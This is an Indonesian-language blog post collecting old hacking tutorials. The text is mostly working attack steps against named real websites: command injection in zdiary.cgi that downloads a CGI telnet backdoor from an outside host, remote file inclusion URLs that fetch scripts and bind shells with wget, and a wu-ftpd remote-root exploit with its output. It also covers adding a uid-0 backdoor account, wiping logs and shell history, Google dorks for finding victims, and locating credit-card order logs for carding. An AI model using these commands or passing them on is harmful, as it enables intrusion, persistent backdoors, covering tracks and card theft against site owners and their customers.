kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password.
Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”




Hacking Server Dari shell

Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell.
lets...Try For Hack...

Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz - www.utay-doyan.cc/xpost.tgz.
Jadi di shell kita tinggal ketik wget www.utay-doyan.cc/ftp.tgz .
Setelah file udah selesai di download ketik tar -zxvf ftp.tgz .
Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost.
Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :

[iwek@jarada xwurm]$ ./scan 211.240
Wait for Scanning 211.240 (3-5 minutes for class B)
Scan Result:
--------------------------------
211.240.28.66
211.240.38.1
211.240.48.62
211.240.48.190
211.240.56.62
211.240.56.254
211.240.56.126
211.240.61.30
211.240.61.62
211.240.61.126
211.240.61.158
211.240.61.238
--------------------------------
Results logged in wu-scan.log
[iwek@jarada xwurm]$



nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.

Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :

[iwek@jarada ftp]$ ./awu 211.240.56.254
Checking 211.218.149.47 for vulnerable wu-ftpd 2.x < 2.6.2: Ok
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 211.240.56.254 with (ftp/mozilla@) ... connected.
# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow


Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.

Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik

passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita

nahh apabila ada keterangan :

Changing password for user ganjen
passwd: all authentication tokens updated successfully


berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 -d /

abis itu ketik lagi

passwd -d crit

abis ketik itu kita otomatis udah dapet acces root

nahh semuanya udah selesai khan... jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh... abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh... tekan ctrl d . udah deh ... keluar khan... crottt... hiahaihaia mudah khan :) nice to try. Buat exploits lain kamu bisa cari di site-site laen...



Cari CC di *.Log
Beriku Adalah tutorial lama untuk Cari CC (BUkan Cawat Cewe) :P
Lets Begin

gini
buka google
keywordnya "cgi-bin/store/index.cgi?page="
salah satu alamat site nya yg ada di google : http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
Repair_Manuals.htm <= ini dibuang
trus
trus masukin bug ini => http://fadliyanur.multiply.com/admin/files/order.log
trus
http://www.cashwells.com/cgi-bin/store/index.cgi?page=http://fadliyanur.multiply.com/admin/files/order.log
ok

Ok gimana...tuh drama singkat antara aku dengan Maling_duit...dan kayaknya si Maling_duit ituh yg lagi baca nih :)...emang enaaaaaaaaakkk.....Gua ngga Tanggung Jawab Kalo Trantib datang kerumah elo buat minta jatah hasil cardingan elo yaa...:P

Keep To Share.



Instal CGI Telnet
Install Cgi-telnet
1.buat url seperti ini :


" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "

url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.

2. buat cgi-telnet test.pl jadi file eksekusi :

" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "

3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "

masukkan passwordnya "n0fr13"



PHP SUPER BUGS
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya

0 comments:

Post a Comment

 
Toggle Footer